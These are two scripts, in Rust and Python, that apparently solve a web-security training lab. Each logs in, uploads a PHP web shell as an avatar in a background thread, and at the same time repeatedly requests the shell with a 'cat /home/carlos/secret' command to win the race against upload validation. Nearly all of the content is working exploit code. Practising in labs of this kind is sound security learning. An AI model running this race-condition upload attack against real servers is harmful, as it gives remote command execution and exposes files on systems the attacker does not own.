File: with-rust/file-upload-vulnerabilities/src/bin/07-web-shell-upload-via-race-condition.rs
use file_upload_vulnerabilities::{
    HTTP_CLIENT as client, LOGIN_CSRF_TOKEN_SELECTOR, MY_AVATAR_UPLOAD_CSRF_TOKEN_SELECTOR,
    PASSWORD, USERNAME, WEBSHELL, generate_clap_parser, get_csrf_token, get_flag,
};
use reqwest::blocking::{
    Response,
    multipart::{Form, Part},
};
use std::sync::Mutex;
use std::thread;
use std::time::{Duration, Instant};

fn main() {
    let start_time: Instant = Instant::now();

    let args = generate_clap_parser();
    let lab_url = args.lab_url.as_str().trim_end_matches("/");
    let lab_url_mutex = Mutex::new(lab_url.to_string());

    // Making a GET request to the given url
    let response: Response = client
        .get(format!("{}/login", lab_url))
        .send()
        .expect("[-] Failed to make the GET request");

    // Extracting the body from the response
    let body: String = response.text().expect("[-] Failed to read response text");

    // Getting the CSRF token for the /login page
    let login_page_csrf_token: String = get_csrf_token(&body, &LOGIN_CSRF_TOKEN_SELECTOR);
    println!("[+] Login CSRF Token: {}", login_page_csrf_token);

    // Generating the login form data
    let data = [
        ("username", USERNAME),
        ("password", PASSWORD),
        ("csrf", &login_page_csrf_token),
    ];

    // Logging in as the given user. This request responds with the /my-account?id=wiener page
    let response: Response = client
        .post(format!("{}/login", lab_url))
        .form(&data)
        .send()
        .expect("[-] Failed to login as the given user");

    // Extracting the body from the response
    let body: String = response.text().expect("[-] Failed to read response text");

    // Getting the CSRF token from the /my-account?id=wiener page for the uploading avatar
    let my_avatar_upload_csrf_token: String =
        get_csrf_token(&body, &MY_AVATAR_UPLOAD_CSRF_TOKEN_SELECTOR);
    println!(
        "[+] My Avatar Upload CSRF Token: {}",
        &my_avatar_upload_csrf_token
    );

    // Generating the web shell payload to upload
    let payload: Part = Part::bytes(WEBSHELL.as_bytes())
        .file_name("web-shell.php")
        .mime_str("application/x-php")
        .expect("[-] Failed to generate payload");

    // Generating avatar upload multipart form data
    let form: Form = Form::new()
        .text("user", USERNAME)
        .text("csrf", my_avatar_upload_csrf_token)
        .part("avatar", payload);

    // NOTE: Uploading the payload in a separate thread
    thread::spawn(move || {
        client
            .post(format!(
                "{}/my-account/avatar",
                lab_url_mutex.lock().unwrap()
            ))
            .multipart(form)
            .send()
            .expect("[-] Failed to upload the payload");
    });

    let mut is_flag_found: bool = false;

    // NOTE: Fetching the flag simultaneously from the main thread
    for _ in 0..20 {
        if is_flag_found {
            break;
        }

        let response: Response = client
            .get(format!(
                "{}/files/avatars/web-shell.php?command=cat /home/carlos/secret",
                lab_url
            ))
            .send()
            .expect("[-] Failed to get secret");

        if response.status() == 200 {
            is_flag_found = true;
            get_flag(response.text().expect("[-] Failed to read secret"));
        }
    }

    let total_time: Duration = Instant::elapsed(&start_time);
    println!("[+] Total time taken: {}", total_time.as_secs_f64());
}

File: with-python/server-side/file-upload-vulnerabilities/07-web-shell-upload-via-race-condition.py
from lib import (
    USERNAME,
    PASSWORD,
    WEBSHELL,
    LOGIN_CSRF_XPATH,
    MY_ACCOUNT_AVATAR_UPLOAD_CSRF,
    SESSION,
    generate_parser,
    get_flag,
    get_csrf_token,
)
import time
import threading


def upload_payload(lab_url: str, data: dict):
    SESSION.post(
        url=f"{lab_url}/my-account/avatar",
        data=data,
        files={
            # File Tuple Syntax: (filename, file-content, content-type)
            "avatar": (
                "web-shell.php",
                WEBSHELL,
                "application/x-php",
            )
        },
    )


if __name__ == "__main__":
    start_time = time.perf_counter()

    args = generate_parser()

    lab_url = args.lab_url.strip("/")

    # Extracting the login form csrf token using xpath
    login_csrf_token = get_csrf_token(
        # Fetching the login page to get the login page csrf token and parsing it with lxml to generate a tree
        SESSION.get(url=f"{lab_url}/login").text,
        LOGIN_CSRF_XPATH,
    )
    print(f"[+] Login CSRF Token: {login_csrf_token}")

    # Extracting the avatar upload form csrf token
    my_account_avatar_upload_csrf = get_csrf_token(
        # Logging in as the given user and generating the tree for My Account page
        SESSION.post(
            url=f"{lab_url}/login",
            data={"username": USERNAME, "password": PASSWORD, "csrf": login_csrf_token},
        ).text,
        MY_ACCOUNT_AVATAR_UPLOAD_CSRF,
    )
    print(f"[+] My Account Avatar CSRF Token: {login_csrf_token}")

    data = {
        "user": USERNAME,
        "csrf": my_account_avatar_upload_csrf,
    }

    # NOTE: Uploading the payload in a separate thread
    t = threading.Thread(target=upload_payload, args=(lab_url, data))
    t.start()

    is_flag_found = False

    # NOTE: Fetching the flag simultaneously from the main thread
    for _ in range(20):
        if is_flag_found:
            break

        response = SESSION.get(
            url=f"{lab_url}/files/avatars/web-shell.php?command=cat /home/carlos/secret"
        )

        if response.status_code == 200:
            is_flag_found = True
            get_flag(response.text)

    end_time = time.perf_counter()
    print(f"[+] Total Time Taken: {end_time - start_time}")
